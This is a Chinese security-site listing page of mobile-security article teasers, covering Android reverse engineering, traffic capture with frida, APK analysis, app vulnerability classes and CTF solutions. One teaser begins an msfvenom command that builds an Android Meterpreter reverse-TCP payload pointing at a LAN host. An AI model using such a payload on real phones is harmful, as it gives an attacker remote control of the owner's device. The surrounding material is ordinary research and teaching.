移动安全 - 第 174 | CN-SEC 中文网

移动安全

Android逆向入门成长计划【免费知识星球+微信交流群】

Hi，ALL！即日起，WhITECat安全团队逆向小组将正式推进：【Android逆向入门成长计划】本次为纯公益的项目，我们计划通过免费的知识星球+微信交流群+语雀问答库的形式持续的去分享和共同进步；...

11月23日386 views评论

阅读全文

移动安全

抓包quick手

工具1、jadx2、frida 网络请求框架分析请求协议通过查看app源码，可以清楚看到okhttp3的包名，使用okhttp3就很香。okhttp3分析1、打印网络请求通过他的sign或者sig3算...

11月23日397 views评论

阅读全文

移动安全

安卓应用层协议/框架通杀抓包：实战篇

0x00.前言（文章分为实战和源码分析，本文为实战篇）环境和工具准备：kali-linuxpython 3.xr0capturefrida / frida-toolsapkshell0x01.什么是 ...

11月22日289 views评论

阅读全文

移动安全

利用msf框架对安卓手机进行简单操作

测试机型红米k30 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 R > vir...

11月22日454 views评论

阅读全文

移动安全

巧用APP历史版本对APP登录signature分析

前言之前在火线zone看到利用app历史版本来进行app的逆向分析，可以降低一下分析难度，比较老版本的安全防护做的不是很到位。正好最近有一个app，尝试利用一下老版本进行分析登录签名，没想到效果非常...

11月22日98 views评论

阅读全文

移动安全

Android Linker详解

看雪论坛作者ID：r0ysue1简介接上篇Linker源码详解(一)，本文继续来分析Linker的链接过程。为了更好的理解Unidbg的原理，我们需要了解很多细节。虽然一个模拟二进制执行框架的弊端很多...

11月21日163 views评论

阅读全文

移动安全

APK分析基础工具

引言随着移动互联网的发展，越来越多犯罪分子通过移动端APP来进行技术性违法犯罪行为，其中包括赌博类、色情类、诈骗类等APP。而由于Android 系统生态开放性，APP可以不经过审核，不上架应用市场...

11月18日709 views评论

阅读全文

移动安全

某行小程序投标测试的思路和坑

先发下牢骚吧，最近看到的文章，大体上往底层概念越来越多，各种挖矿木马的，还有各种难理解的概念，都没有勇气点开看看了。有关Web层次有价值的文献越来越少了，这点最近在打CTF时候也体现出来了...

11月18日86 views评论

阅读全文

移动安全

Android APP漏洞之战——权限安全和安全配置漏洞详解

本文为看雪论坛精华文章看雪论坛作者ID：随风而行aa一简介前几篇帖子我们将Android的四大组件中漏洞做了一个具体的介绍，本节我们将进一步介绍Android中的权限配置相关的漏洞以及Android安...

11月15日218 views评论

阅读全文

移动安全

记一次因为无聊引发的逆向（Android逆向）

更多全球网络安全资讯尽在邑安全概述在夏日等待报道的日子总是很枯燥，闲来无事找了一个小游戏玩，可是竟然没事有事就弹广告，还不让我用里面炫酷的Model，实在是让我很憋屈，抱着烦躁的心态，苦学Androi...

11月12日154 views评论

阅读全文

移动安全

通过抓包方式固定微信内的视频

在日常取证工作中，我们经常会遇到需要固定微信内小视频的情况，比如朋友圈内好友转发链接内的视频、订阅号内的视频、微信视频号内的视频，这些视频不论是在微信手机端还是PC端都无法保存。今天，小编给大家分享下...

11月08日657 views评论

阅读全文

移动安全

【Android CTF】使用trace进行算法还原

作者论坛账号：neilwu一、题目1、android 逆向题小伙伴发来的题，说是某比赛线下题目2、涉及算法AES魔改RC5二、解题过程1、java层2、native层sub_F08 复制代码隐藏代码...

11月06日100 views已关闭评论

阅读全文

在线咨询

微信